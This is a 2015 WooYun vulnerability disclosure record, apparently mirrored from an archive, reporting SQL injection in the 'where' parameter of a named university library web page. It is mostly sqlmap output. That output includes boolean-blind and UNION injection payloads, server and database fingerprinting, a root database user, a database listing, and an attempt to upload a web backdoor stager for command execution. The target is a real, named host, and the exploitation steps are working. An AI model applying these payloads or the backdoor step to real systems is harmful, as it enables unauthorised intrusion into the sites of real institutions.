乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-25: 厂商已经主动忽略漏洞,细节向公众公开
RT
1、http://www.lib.hustwb.edu.cn/lib_cj/wedit.php?where=Nwhere参数存在注入数据
Place: GETParameter: where Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: where=B AND 3978=3978 Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: where=B UNION ALL SELECT NULL, CONCAT(0x3a706f6c3a,0x63767273706c74736d6f,0x3a786f6b3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#---[12:54:21] [INFO] testing MySQL[12:54:47] [INFO] confirming MySQL[12:55:17] [WARNING] in case of continuous data retrieval problems you are advised to try a hidden switch '--no-cast' (fixing problems with some collation issues) and/or switch '--hex'[12:55:45] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.0.55, PHP 5.0.2back-end DBMS: MySQL < 5.0.0[12:55:45] [INFO] fetching current usercurrent user: 'root@localhost'
available databases [2]:[*] test[*] test\\_%
[13:46:24] [INFO] going to use a web backdoor for command prompt[13:46:24] [INFO] fingerprinting the back-end DBMS operating system[13:46:54] [INFO] the back-end DBMS operating system is Linux[13:46:54] [INFO] trying to upload the file stagerwhich web application language does the web server support?[1] ASP[2] ASPX[3] PHP (default)[4] JSP>
危害等级:无影响厂商忽略
忽略时间:2015-09-25 16:41
无
暂无